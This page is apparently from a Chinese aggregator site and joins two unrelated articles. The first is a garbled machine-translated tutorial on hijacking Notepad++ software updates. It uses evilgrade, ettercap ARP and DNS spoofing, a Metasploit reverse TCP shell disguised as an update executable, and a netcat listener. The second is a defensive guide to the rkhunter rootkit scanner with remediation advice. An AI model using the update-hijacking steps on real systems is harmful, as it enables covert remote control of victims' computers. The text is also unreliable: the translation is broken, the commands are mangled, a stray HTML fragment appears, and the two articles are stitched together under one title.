如何劫持软件更新来安装 Rootkit 的后门访问

Posted

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了如何劫持软件更新来安装 Rootkit 的后门访问相关的知识,希望对你有一定的参考价值。

参考技术A 有无数种方法破解系统。如果我们想应用自己的系统,我们不应该忽视任何的可能性,我们需要搜索弱点保持警惕。在这次破解,我们将会看看滥用信任用户对软件更新,他们的系统上安装监听器/rootkit。
利用”值得信赖”的软件更新
我们都看见这条消息 — —现在有可用的软件更新!无一例外,我们相信此消息并下载的更新,大概是使我们更好地工作、 添加新功能,或使我们的系统更安全的系统。
如果,相反,当我们要提示下载更新,我们的系统会给出一个恶意的黑客控制安装恶意软件?这是我们要对我们的受害者在这里做什么 !
不同于其他黑客攻击,这是一个独立的,正是这样的操作系统、 端口等。在这里我们将滥用用户信任,没有一个操作系统或应用程序。
这将是我们为 Null Byte, 做过的最复杂黑客之一,所以如果你是新来的黑客,你可能想回来后做点工作背景。这次破解也利用了我们做在早些时候教程使用中间人攻击,所以您可能想要先读一下。
第 1 步: 安装 NotePad + +
在这次破解,我们将使用Notepad + +作为我们的示例软件,我们将劫持其更新,所以您将需要将它安装在一个系统上。在我的示例中,我下载了它到 Windows 7 的系统。
您可以下载最新版本的 Notepad + +.
第 2 步: 下载和安装 EvilGrade
下一步,我们会安装<a href="http://www.microsofttranslator.com/bv.%3Ca%20href=" http:="" www.2cto.com="" kf="" web="" asp="" "="" target="_blank" class="keylink" style="color: rgb(51, 51, 51); text-decoration: none;">aspx?from=&to=zh-CHS&a=http%3A%2F%2Fwww.infobytesec.com%2F" target="_top">Infobytesec evilgrade,它被设计成一个模块化的框架,使攻击者可以通过注射”evil”更新到不知道用户的更新。我们可以下载从 GitHub evilgrade.
现在被称为evilgrade目录。
•mkdir -p /root/evilgrade
现在更改目录。
•cd /root/evilgrade
下一步我们解压并安装 evilgrade。
•tar -xvf isr-evilgrade-2.0.0.tar.gz

第 3 步: 运行 Evilgrade
下一步我们需要运行 evilgrade。我们键入:
•./ evilgrade

我们现在使用它从它自己的提示符运行于 evilgrade 交互式模式
•evilgrade >
第 4 步: 列出模块
现在,运行的 evilgrade,让我们看看这些evilgrade 已建的模块。在这里,代表evilgrade模块设计劫持其更新/升级过程的软件。在这个技巧,当然,我们会劫持Notepad++升级。
正如你可以看到下面,evilgrade有许多其它的软件模块,但它远覆盖所有的软件更新/升级。
•show modules

关键是要找到受害者是使用什么程序,也是evilgrade的模块和目标应用程序列表。
第 5 步: 配置Notepad
接下来,我们需要告诉我们想要劫持其升级的过程是什么的软件的 evilgrade。让我们告诉 evilgrade 我们想要劫持notepadplus.
•evilgrade>configure notepadplus
第 6 步: 查看 Notepad + + 模块需要什么参数
我们的下一步就是看哪些参数是evilgrade notepadplus模块需要的功能。我们用类似下面的命令检查这个Metasploit键入:
•show options

我们可以在上面的截图中看到此模块,需要我们到 Notepad + + 的软件和更新,即 sourceforge.net 源点。此外,我们需要设置代理,将是我们想要在受害人在预期更新位置上安装的恶意负载。
第 7 步: 生成一个Metsploit有效载荷
在,我们已经设置evilgrade了,我们需要开发一个恶意的有效载荷交付给升级软件,而不是实际的升级。我们可以用Metasploit的做到这一点。
如果您按照我的Metasploit的其他教程,你知道,我们可以选择一些不同的有效载荷使用Metasploit的(有效载荷是什么,我们加载到受害系统给我们控制)。在这种情况下,我们将使用其中一个最基本的有效载荷,在reverse tcp shell.。

我们可以产生一个有效载荷而不使用以下命令打开Metasploit的。此命令需要从Metasploit的框架,并将其装入一个利用一个叫做notepadplus_update.exe文件。
•/pentest/exploits/framework/modules/payloads/windows
• shell_reverse_tcp LHOST 192.168.1.104
•> /root/evilgrade/notepadplus_update.exe

请注意,如果您使用的是不同版本的Backtrack或kali,这些有效载荷模块在不同的目录。
第8步:启动Evilgrade
接下来,我们必须启动evilgrade 服务器。这是以一个简单的初始命令。
•evilgrade>start
第 9 步:添加Notepad++更新服务器作为域
我们的下一步是添加Notepad++我们要劫持域名。我们可以通过添加一个进入ettercap的etter.dns欺骗模块。这使我们能够欺骗受害者的软件更新源域名。
由于Notepad++是由SourceForge,我们添加下面一行的etter.dns文件结束。
•notepad-plus.sourceforge.net A 192.168.1.104

当然,你使用的IP地址应该是你想要更新过程来寻找你的邪恶更新IP地址。
第 10 步:配置iptables
iptables是Linux或UNIX内置防火墙/路由器。我们可以使用这个功能,路由的流量通过我们的系统在一个中间人攻击。让我们在您最喜爱的文本编辑器中打开etter.conf文件。
kwrite /etc/etter.conf

如图所见,通过文件当你滚动约三分之二,有一个条目,我已在 iptables 上突出显示。简单地取消注释 (删除 #) 到第二个和第三行,以便使用 iptables。
第 11 步: 开始 Ettercap
我们现在可以用下面的命令启动 ettercap。
•ettercap-Tqi eth0-P dns_spoof-M arp 192.168.1.114 192.168.1.104
条件:
•-T 指定终端接口
•-q 使用安静模式
•-i eth0说,我们想要使用eth0作为我们的接口
• -P dns_spoof选定,我们想要使用 dns欺骗 plug in_
•-M arp说,我们想要使用 arp 中间人攻击上之间两个 IP addresses_
第 12 步: 开启 Netcat 监听器
现在我们需要从我们的攻击机器启动netcat 侦听器。我们需要监听的evilgrade应用程序定义的端口,在这种情况下,Notepad + + 的端口为1234。
•nc-l-p 1234
第 13 步: 打开 Notepad + +
现在,让我们在受害者计算机打开 Notepad + + 。

第 14 步: 验证 DNS 欺骗
需要你打开 Notepad + +,如果此更新不会激发,我们需要检查 DNS 欺骗。
Evilgrade 是用于劫持软件更新的强大工具。通过播放一次攻击的人在中,我们可以攻击任何操作系统更新的软件。我们这里有的唯一限制是模块的 evilgrade 来劫持其更新。

rootkit后门检查工具RKHunter

一、概述

简介

中文名叫”Rootkit猎手”,

rkhunter是Linux系统平台下的一款开源入侵检测工具,具有非常全面的扫描范围,除了能够检测各种已知的rootkit特征码以外,还支持端口扫描、常用程序文件的变动情况检查。

rkhunter的官方网站位于http://www.rootkit.nl/注意:官网不能直接打开,必须要能访问谷歌才行。

 

目前最新的版本是rkhunter-1.4.6。

源码下载链接:

http://jaist.dl.sourceforge.net/project/rkhunter/rkhunter/1.4.6/rkhunter-1.4.6.tar.gz

 

rootkit是什么?

   rootkit是Linux平台下最常见的一种木马后门工具,它主要通过替换系统文件来达到入侵和和隐蔽的目的,这种木马比普通木马后门更加危险和隐蔽,普通的检测工具和检查手段很难发现这种木马。rootkit攻击能力极强,对系统的危害很大,它通过一套工具来建立后门和隐藏行迹,从而让攻击者保住权限,以使它在任何时候都可以使用root  权限登录到系统。

           rootkit主要有两种类型:文件级别和内核级别。

   文件级别的rootkit: 一般是通过程序漏洞或者系统漏洞进入系统后,通过修改系统的重要文件来达到隐藏自己的目的。在系统遭受rootkit攻击后,合法的文件被木马程序替代,变成了外壳程序,而其内部是隐藏着的后门程序。通常容易被rootkit替换的系统程序有login、ls、ps、ifconfig、du、find、netstat等。文件级别的rootkit,对系统维护很大,目前最有效的防御方法是定期对系统重要文件的完整性进行检查,如Tripwire、aide等。 

   内核级rootkit: 是比文件级rootkit更高级的一种入侵方式,它可以使攻击者获得对系统底层的完全控制权,此时攻击者可以修改系统内核,进而截获运行程序向内核提交的命令,并将其重定向到入侵者所选择的程序并运行此程序。内核级rootkit主要依附在内核上,它并不对系统文件做任何修改。以防范

为主。

 

二、安装rkhunter

环境说明

操作系统:centos 6.9

目前有一台服务器,负载比较高,cpu使用率为:85%。

使用top查看进程,发现最高的进程,在1%左右。一直不明白,为何负载如此之高,怀疑中了木马程序。

 

安装

直接yum安装

yum install -y rkhunter

 

在线升级rkhunter

rkhunter是通过一个含有rootkit名字的数据库来检测系统的rootkits漏洞, 所以经常更新该数据库非常重要, 你可以通过下面命令来更新该数据库:

rkhunter --update

 

为基本系统程序建立校对样本,建议系统安装完成后就建立

rkhunter --propupd

 

运行rkhunter检查系统

它主要执行下面一系列的测试:

    1. MD5校验测试, 检测任何文件是否改动.

    2. 检测rootkits使用的二进制和系统工具文件.

    3. 检测特洛伊木马程序的特征码.

    4. 检测大多常用程序的文件异常属性.

    5. 执行一些系统相关的测试 - 因为rootkit hunter可支持多个系统平台.

    6. 扫描任何混杂模式下的接口和后门程序常用的端口.

    7. 检测如/etc/rc.d/目录下的所有配置文件, 日志文件, 任何异常的隐藏文件等等. 例如, 在检测/dev/.udev和/etc/.pwd.lock文件时候, 我的系统被警告.

    8. 对一些使用常用端口的应用程序进行版本测试. 如: Apache Web Server, Procmail等.

 

如果您不想要每个部分都以 Enter 来继续,想要让程序自动持续执行,可以使用:

rkhunter --check --sk

 

输出如下:

[ Rootkit Hunter version 1.4.6 ]
...
/sbin/chkconfig                                          [ OK ]
/sbin/depmod                                             [ OK ]
...
/bin/chown                                               [ Warning ]
...
/bin/date                                                [ Warning ]

...
/usr/bin/top                                             [ Warning ]
...
/usr/bin/vmstat                                          [ Warning ]
...
System checks summary
=====================

File properties checks...
    Files checked: 134
    Suspect files: 4

Rootkit checks...
    Rootkits checked : 502
    Possible rootkits: 0

Applications checks...
    All checks skipped

The system checks took: 1 minute and 57 seconds

All results have been written to the log file: /var/log/rkhunter/rkhunter.log

One or more warnings have been found while checking the system.
Please check the log file (/var/log/rkhunter/rkhunter.log)

 

从以上信息可以看出,已经有4个系统命令,被串改了。

 

三、一些解决思路

如果您的系统经过 rkhunter 的检测之后,却发现很多的『红字』时,该怎么办?很简单, 可以参考这个网页提供的方法:

http://www.rootkit.nl/articles/rootkit_hunter_faq.html

 

    基本上,官方网站与一般网管老手的建议都一样,如果被 rootkit 之类的程序包攻击后 ( 也就是上一节的检测表中的第二部分所攻击时 ),那么最好最好直接重新安装系统, 不要存在说可以移除 rootkit 或者木马程序的幻想,因为,『隐藏』本来就是 rootkit 与木马程序的拿手好戏! 我们不知道到底这个 rootkit 或者木马程序有多剽悍,为了保险起见,还是重灌系统吧!如何重灌?简单的说:

    1.将原主机的网络线拔除;

    2.备份您的数据,最好备份成两部分,一部份是全部的系统内容,越详尽越好,包括 binary files 与 logfile 等等, 至于另一部份则可以考虑仅备份重要的数据文件即可!

    3.将上个步骤的数据备份(仅重要数据部分!)进行整体的检查,察看是否有怪异的数据存在(这部分可能会花去不少时间!)

    4.重新安装一部完整的系统,这包括:

    o仅安装需要的套件在服务器上面;

    o先进行 简单的防火墙 设定后才进行联机;

    o以 APT/YUM 之类的工具进行在线更新;

    o执行类似 rkhunter/nessus 之类的软件,检验系统是否处在较为安全的状态

    5.将原本的重要数据移动至上个步骤安装好的系统当中,并启动原本服务器上面的各项服务;

    6.以 rkhunter/nessus 之类的软件检验系统是否处在较为安全的环境,并且加强防火墙的机制!

    7.最后,将原本完整备份的数据拿出来进行分析,尤其是 logfile 部分,试图找出 cracker 是藉由那个服务?那个时间点? 以那个远程 IP 联机进入本机等等的信息,并针对该信息研拟预防的方法,并应用在已经运作的机器上。

 

所以,只有重新安装系统,服务重新部署才是最妥当的办法。

 

本文参考链接:

https://www.cnblogs.com/cp-miao/p/6141025.html

 

以上是关于如何劫持软件更新来安装 Rootkit 的后门访问的主要内容,如果未能解决你的问题,请参考以下文章

rootkit后门检测工具RKHunter

rootkit后门检查工具RKHunter

rootkit后门检测工具

rootkit后门检查工具RKHunter

rootkit后门检测工具chkrootkit

装系统中的后门是啥?起啥作用?有啥有利和有害的?如何弄?